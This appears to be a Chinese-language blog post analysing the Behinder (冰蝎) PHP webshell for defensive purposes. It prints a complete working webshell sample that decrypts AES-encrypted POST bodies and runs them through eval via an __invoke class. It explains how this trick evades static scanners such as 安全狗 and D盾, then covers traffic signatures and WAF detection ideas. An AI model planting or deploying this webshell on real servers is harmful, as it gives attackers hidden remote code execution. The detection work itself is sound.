木马样本:
<?php
class C{
public function __invoke($p)
{
eval($p."");
}
};
session_start();
isset($_GET['pass'])?print $_SESSION['k']=substr(md5(uniqid(rand())),16):($b=explode('|',openssl_decrypt(file_get_contents("php://input"), "AES128", $_SESSION['k'])))&@call_user_func(new C(),$b[1]);
?>
可以看到冰蝎的木马先获取get参数pass,获取到之后随机生成一个key。然后后续再使用这个key当做AES128的秘钥进行解密并执行
根据webshell执行方式可以确定冰蝎木马存在以下静态特征:
- $_SESSION[]
Webshell一定会使用session变量在服务器缓存一个key用于流量密文的解密。
- openssl_decrypt()
Webshell由于需要让流量加密,所以需要使用openssl_decrypt函数来对流量进行加密
- call_user_func()
call_user_func()回调函数用于执行传递过来的php代码
- __invoke()
Webshell最常见的躲避静态查杀的版本,利用类的魔术方法来执行eval可绕过一些weshell查杀软件
※其中call_user_func()与魔术方法之间的配合在以前通常用于绕过安全狗,D盾等软waf的静态查杀,执行代码也不一定会只限于__invoker,也有可能是其他魔术方法
0x02 冰蝎webshell流量分析
冰蝎webshell跟控制端通讯流程
通过抓包发现冰蝎在存入webshell地址并建立连接会发送4个包
其中前两个包分别发送了两组phpsessionid与key,第三个包为获取基本信息(phpinfo)的包,第四个包为保持连接的包。
其中,第三个包的body长度为1112,第四个包body长度为2220,这两个包的长度为定长,且第四个包在保持连接的时候会一直产生,且PHPSESSIONID会变化。
通过查看冰蝎的通讯包会发现冰蝎的流量有如下特征:
- 交换key
请求包为GET请求,且带有参数;响应包为chunk编码,且返回16位hex字符串与一个PHPSESSIONID。
- 执行代码
请求包包含PHPSESSIONID,该id为建立连接时候返回的PHPSESSION中的其中一个;
响应包为chunk,且无PHPSESSIONID。
0x03 冰蝎webshell防护思路
临时防护
冰蝎发送的4个请求包中,其中获取信息的包(第三个),以及维持通讯包(第4个)body都是定长,没有跟随冰蝎的链接密码,或者目标ip域名等信息变化而变化,且body体为base64编码之后的aes密文,增删改任意字符都会造成解密失败。
解密
冰蝎在建立连接的前两个包会交换key与phpsessionid,waf端可以通过这两个回包的特征来判断是否会为冰蝎交换key的请求并缓存key与phpsessionid,然后通过进行后续检测请求中的PHHSESSIONID来判断是否为冰蝎的后续流量,并通过缓存的key来解密,解密的内容与普通的木马通讯差别不大。
扫一扫
8331
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
